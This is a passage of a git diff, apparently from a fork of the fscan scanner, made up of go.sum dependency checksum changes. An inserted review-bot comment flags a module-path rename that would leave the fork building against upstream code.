v0.0.0-20210722135532-667f2b7c528f gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b ) diff --git a/go.sum b/go.sum index 341ad2e..09150ac 100644 
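Review bot: In the go.mod hunk, the module is renamed to `github.com/timwhitez/fscan` while a new requirement on the original module, `github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4`, is added. That combination suggests some imports in the tree still use the old `github.com/shadow1ng/fscan/...` path, though the Go sources are not visible in this part of the patch. If so, those packages are built from the upstream module at that pseudo-version rather than from this repository, and local edits to them (possibly including the zip-based PoC loading this commit introduces) would silently not be compiled in. It also means the binary mixes code from two origins, which makes the shipped scanner logic harder to audit. I would rewrite the remaining imports to the new module path and run `go mod tidy` so the self-referential `require` line disappears, or else keep the original module path and drop the requirement.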
--- a/go.sum
+++ b/go.sum
@@ -1,98 +1,187 @@ cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= +cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= +github.com/antihax/optional v1.0.0/go.mod h1:uupD/76wgC+ih3iEmQUL+0Ugr19nfwCT1kdvxnR2qWY= github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f h1:0cEys61Sr2hUBEXfNV8eyQP01oZuBgoMeHunebPirK8= github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f/go.mod h1:T7PbCXFs94rrTttyxjbyT5+/1V8T2TYDejxUfHJjw1Y= github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= +github.com/cncf/udpa/go v0.0.0-20201120205902-5459f2c99403/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= +github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/denisenkom/go-mssqldb v0.10.0 h1:QykgLZBorFE95+gO3u9esLd0BmbvpWp0/waNNZfHBM8= github.com/denisenkom/go-mssqldb v0.10.0/go.mod h1:xbL0rPBG9cCiLr28tMa8zpbdarY27NDyej4t/EjAShU= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= +github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= +github.com/envoyproxy/go-control-plane 
v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= -github.com/geoffgarside/ber v1.1.0 h1:qTmFG4jJbwiSzSXoNJeHcOprVzZ8Ulde2Rrrifu5U9w= -github.com/geoffgarside/ber v1.1.0/go.mod h1:jVPKeCbj6MvQZhwLYsGwaGI52oUorHoHKNecGT85ZCc= +github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/go-sql-driver/mysql v1.6.0 h1:BCTh4TKNUYmOmMUcQ3IipzF5prigylS7XXjEkfCHuOE= github.com/go-sql-driver/mysql v1.6.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg= github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY= github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0= -github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58= github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= -github.com/golang/protobuf v1.3.4 h1:87PNWwrRvUSnqS4dlcBU/ftvOIBep4sYuBLlh6rX2wk= github.com/golang/protobuf v1.3.4/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= -github.com/google/cel-go v0.6.0 h1:Li+angxmgvzlwDsPuFc1/nbqnq3gc4K/X7NrWjOADFI= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod 
h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= +github.com/golang/protobuf v1.5.2 h1:ROPKBNFfQgOUMifHyP+KYbvpjbdoFNs+aK7DXlji0Tw= +github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= github.com/google/cel-go v0.6.0/go.mod h1:rHS68o5G1QcUv/ubiCoZ5nT5LHxRWWfS0qMzTgv42WQ= +github.com/google/cel-go v0.7.3 h1:8v9BSN0avuGwrHFKNCjfiQ/CE6+D6sW+BDyOVoEeP6o= +github.com/google/cel-go v0.7.3/go.mod h1:4EtyFAHT5xNr0Msu0MJjyGxPUgdr9DlcaPyzLt/kkt8= github.com/google/cel-spec v0.4.0/go.mod h1:2pBM5cU4UKjbPDXBgwWkiwBsVgnxknuEJ7C5TDWwORQ= +github.com/google/cel-spec v0.5.0/go.mod h1:Nwjgxy5CbjlPrtCWjeDjUyKMl8w41YBYGjsyDdqk0xA= github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= -github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= -github.com/hirochachacha/go-smb2 v1.0.10 h1:fiSNyMOOlWzfdTVk6VtvxfDGqhjNDI2iYZjd/jdtmhk= -github.com/hirochachacha/go-smb2 v1.0.10/go.mod h1:8F1A4d5EZzrGu5R7PU163UcMRDJQl4FtcxjBfsY8TZE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.5 
h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU= +github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw= github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067 h1:P2S26PMwXl8+ZGuOG3C69LG4be5vHafUayZm9VPw3tU= github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067/go.mod h1:2lmrmq866uF2tnje75wQHzmPXhmSWUt7Gyx2vgK1RCU= -github.com/lib/pq v1.10.1 h1:6VXZrLU0jHBYyAqrSPa+MgPfnSvTPuMgK+k0o5kVFWo= github.com/lib/pq v1.10.1/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= +github.com/lib/pq v1.10.2 h1:AqzbZs4ZoCBp+GtejcpCpcxM3zlSMx29dXbUSeVtJb8= +github.com/lib/pq v1.10.2/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= +github.com/rogpeppe/fastuuid v1.2.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca h1:NugYot0LIVPxTvN8n+Kvkn6TrbMyxQiuvKdEwFdR9vI= github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca/go.mod h1:uugorj2VCxiV1x+LzaIdVa9b4S4qGAcH6cbhh4qVxOU= +github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4 h1:OWSmL0LYmfDX2oXDt3RErvCAQpyZNUm7AFgZJ5q43sA= +github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4/go.mod h1:dG+K6/t5Skg+75lDytmXIBzl7XU4rMvBaMYOeIifBTI= github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 h1:GVFkBBJAEO3CpzIYcDDBdpUObzKwVW9okNWcLYL/nnU= github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8/go.mod h1:phLSETqH/UJsBtwDVBxSfJKwwkbJcGyy2Q/h4k+bmww= +github.com/stoewer/go-strcase v1.2.0 
h1:Z2iHWqGXH00XYgqDmNgQbIBxf3wrNq0F3feEy0ainaU= +github.com/stoewer/go-strcase v1.2.0/go.mod h1:IBiWB2sKIp3wVVQ3Y035++gc+knqhUQag1KpM8ahLw8= github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5cxcmMvtA= github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0= github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= +go.opentelemetry.io/proto/otlp v0.7.0/go.mod h1:PqfVotwruBrMGOCsRd/89rSnXhoiJIqeYNgFYFoEGnI= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= -golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de h1:ikNHVSjEfnvz6sxdSPCaPt572qowuyMDMJLLm3Db3ig= +golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= +golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97 h1:/UOmuWzQfxxo9UtlXMwuQU8CMgg1eZXqTRwkSQJWKOI= +golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint 
v0.0.0-20210508222113-6edffad5e616/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= -golang.org/x/net v0.0.0-20200301022130-244492dfa37a h1:GuSPYbZzB5/dcLNCwLQLsg3obCJtX9IJhpXkvY7kzk0= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM= +golang.org/x/net v0.0.0-20210716203947-853a461950ff h1:j2EK/QoxYNBsXI4R7fQkkRUk8y6wnOBI+6hgPdP/6Ds= +golang.org/x/net v0.0.0-20210716203947-853a461950ff/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= +golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= 
golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527 h1:uYVVQ9WP/Ds2ROhcaGPeIdVq0RIXVLwsHlnvJ+cT1So= golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210330210617-4fbd30eecc44/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1 h1:SrN+KX8Art/Sf4HNj6Zcz06G7VEz+7w9tdXTPOZ7+l4= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod 
h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= -golang.org/x/text v0.3.2 h1:tW2bmiBqwgJj/UpqtC8EpXEZVYOwU0yG4iWbprSVAcs= golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= +golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= +golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= +golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28= +golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= +golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= +golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 
google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= google.golang.org/genproto v0.0.0-20200305110556-506484158171/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= -google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0 h1:N5O9PpTbQrkvH0IQ1q+mmGyg8Gt6iKcu6b6+gmz3jnA= google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= +google.golang.org/genproto v0.0.0-20200513103714-09dca8ec2884/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= +google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= +google.golang.org/genproto v0.0.0-20201102152239-715cce707fb0/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= +google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f h1:YORWxaStkWBnWgELOHTmDrqNlFXuVGEbhwbB5iK94bQ= +google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f/go.mod h1:ob2IJxKrgPT52GcgX759i1sleT07tiKowYBGbczaW48= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= -google.golang.org/grpc v1.27.1 h1:zvIju4sqAGvwKspUQOhwnpcqSbzi7/H6QomNNjTL4sk= google.golang.org/grpc v1.27.1/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.33.1/go.mod h1:fr5YgcSWrqhRRxogOsw7RzIpsmvOZ6IcH4kBYTpR3n0= +google.golang.org/grpc v1.33.2/go.mod 
h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= +google.golang.org/grpc v1.36.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= +google.golang.org/grpc v1.39.0/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnDzfrE= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= +google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= +google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= +google.golang.org/protobuf v1.27.1 h1:SnqbnDw1V7RiZcXPx5MEeqPv2s79L9i7BJUlG/+RurQ= +google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= gopkg.in/check.v1 